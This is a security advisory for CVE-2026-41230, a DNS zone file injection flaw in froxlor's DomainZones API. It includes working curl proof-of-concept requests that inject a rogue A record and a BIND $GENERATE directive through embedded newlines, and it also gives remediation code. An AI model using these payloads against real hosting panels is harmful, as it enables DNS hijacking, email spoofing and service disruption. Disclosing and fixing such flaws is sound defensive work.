Summary
DomainZones::add() accepts arbitrary DNS record types without a whitelist and does not sanitize newline characters in the content field. When a DNS type not covered by the if/elseif validation chain is submitted (e.g., NAPTR, PTR, HINFO), content validation is entirely bypassed. Embedded newline characters in the content survive trim() processing, are stored in the database, and are written directly into BIND zone files via DnsEntry::__toString(). An authenticated customer can inject arbitrary DNS records and BIND directives ($INCLUDE, $ORIGIN, $GENERATE) into their domain's zone file.
Details
Missing type whitelist, DomainZones.php:93:
The type parameter is accepted directly from user input with no validation against allowed values:
// lib/Froxlor/Api/Commands/DomainZones.php:93
$type = $this->getParam('type', true, 'A');
The if/elseif chain at lines 170-317 validates content only for 13 known types: A, AAAA, CAA, CNAME, DNAME, LOC, MX, NS, RP, SRV, SSHFP, TLSA, TXT. Any type not in this list falls through with no content validation at all. There is a TODO comment at line 148 acknowledging missing validation:
// TODO regex validate content for invalid characters
Missing newline sanitization, DomainZones.php:154:
The content field only receives trim(), which strips leading/trailing whitespace but preserves embedded newline characters:
// lib/Froxlor/Api/Commands/DomainZones.php:154
$content = trim($content);
Unsafe zone file output, DnsEntry.php:83:
DnsEntry::__toString() concatenates content directly into zone file format without escaping:
// lib/Froxlor/Dns/DnsEntry.php:83
return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t"
. (($this->priority >= 0 && ($this->type == 'MX' || $this->type == 'SRV')) ? $this->priority . "\t" : "")
. $_content . PHP_EOL;
Newlines in $_content produce new lines in the zone file, each parsed by BIND as an independent resource record or directive.
Zone file write, Bind.php:121:
// lib/Froxlor/Cron/Dns/Bind.php:121
fwrite($zonefile_handler, $zoneContent . $subzones);
The AntiXSS filter applied at the API layer (Api.php:91) targets HTML/JS XSS vectors and does not strip newline characters. The web UI form restricts types via a dropdown (formfield.dns_add.php:42-56), but this is client-side only, the server-side DomainZones::add() has no corresponding whitelist.
Execution flow:
- Customer sends API request with
type=NAPTRandcontentcontaining\n-separated lines getParam()returns raw values without sanitization- Type
NAPTRmatches none of the if/elseif conditions, no content validation runs trim($content)preserves embedded newlines- Content is inserted into
domain_dnstable via prepared statement - DNS cron creates
DnsEntryobjects from DB records (Dns.php:297) DnsEntry::__toString()outputs content with embedded newlines into zone formatBind.php:121writes zone to disk; BIND loads the file and processes injected lines as records
PoC
Step 1: Inject a DNS record with embedded newlines via API
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n@ 300 IN A 1.2.3.4\n@ 300 IN NAPTR 100 10 \"\" \"\" \"\" ."
}
}'
Expected: HTTP 200 with success response. The record is stored in the database.
Step 2: Wait for DNS cron to rebuild zones (or trigger manually)
# As admin, trigger the DNS rebuild cron
php /var/www/froxlor/scripts/froxlor_master_cronjob.php --force --dns
Step 3: Inspect the generated zone file
cat /etc/bind/domains/example.com.zone
Expected zone file content includes injected lines:
@ 18000 IN NAPTR 100 10 "" "" "" .
@ 300 IN A 1.2.3.4
@ 300 IN NAPTR 100 10 "" "" "" .
The line @ 300 IN A 1.2.3.4 is parsed by BIND as an independent A record pointing the domain to the attacker's IP.
Step 4: Verify BIND directive injection
curl -s -X POST 'https://froxlor.example.com/api.php' \
-u 'APIKEY:APISECRET' \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"id": 1,
"type": "NAPTR",
"content": "100 10 \"\" \"\" \"\" .\n$GENERATE 1-255 $.0.168.192.in-addr.arpa. PTR host-$.example.com."
}
}'
This injects a $GENERATE directive that creates 255 PTR records.
Impact
An authenticated customer with DNS editing enabled can:
- Inject arbitrary DNS records bypassing all content validation, including A/AAAA records pointing the domain to attacker-controlled IPs, redirecting legitimate traffic.
- Manipulate email authentication by injecting TXT records to override SPF, DKIM, or DMARC policies, enabling email spoofing for the domain.
- Inject BIND server directives (
$INCLUDE,$ORIGIN,$GENERATE) that escape the DNS record context and can attempt to include local server files, alter zone origin, or mass-generate records. - Cause DNS service disruption by injecting malformed records or conflicting directives that cause the zone file to fail loading, disrupting DNS resolution for all records in the domain.
While this requires an authenticated customer account, DNS editing is a standard feature in shared hosting environments. In a multi-tenant deployment, a malicious customer can abuse this to disrupt the DNS server or inject records that bypass validation controls designed to protect zone integrity.
CVE-2026-41230 has a CVSS score of 8.5 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.3.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
1. Add a type whitelist in DomainZones::add() (primary fix):
// lib/Froxlor/Api/Commands/DomainZones.php, after line 93
$type = $this->getParam('type', true, 'A');
$allowed_types = ['A', 'AAAA', 'CAA', 'CNAME', 'DNAME', 'LOC', 'MX', 'NS', 'RP', 'SRV', 'SSHFP', 'TLSA', 'TXT'];
if (!in_array($type, $allowed_types)) {
throw new Exception("DNS record type '" . htmlspecialchars($type) . "' is not supported", 406);
}
2. Strip newline characters from content (defense-in-depth):
// lib/Froxlor/Api/Commands/DomainZones.php, replace line 154
$content = trim(str_replace(["\r", "\n"], '', $content));
3. Sanitize in DnsEntry::__toString() as a belt-and-suspenders measure:
// lib/Froxlor/Dns/DnsEntry.php, at the start of __toString()
$_content = str_replace(["\r", "\n"], '', $this->content);
Frequently Asked Questions
- What is CVE-2026-41230? CVE-2026-41230 is a high-severity security vulnerability in froxlor/froxlor (composer), affecting versions < 2.3.6. It is fixed in 2.3.6.
- How severe is CVE-2026-41230? CVE-2026-41230 has a CVSS score of 8.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of froxlor/froxlor are affected by CVE-2026-41230? froxlor/froxlor (composer) versions < 2.3.6 is affected.
- Is there a fix for CVE-2026-41230? Yes. CVE-2026-41230 is fixed in 2.3.6. Upgrade to this version or later.
- Is CVE-2026-41230 exploitable, and should I be worried? Whether CVE-2026-41230 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-41230 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-41230? Upgrade
froxlor/froxlorto 2.3.6 or later.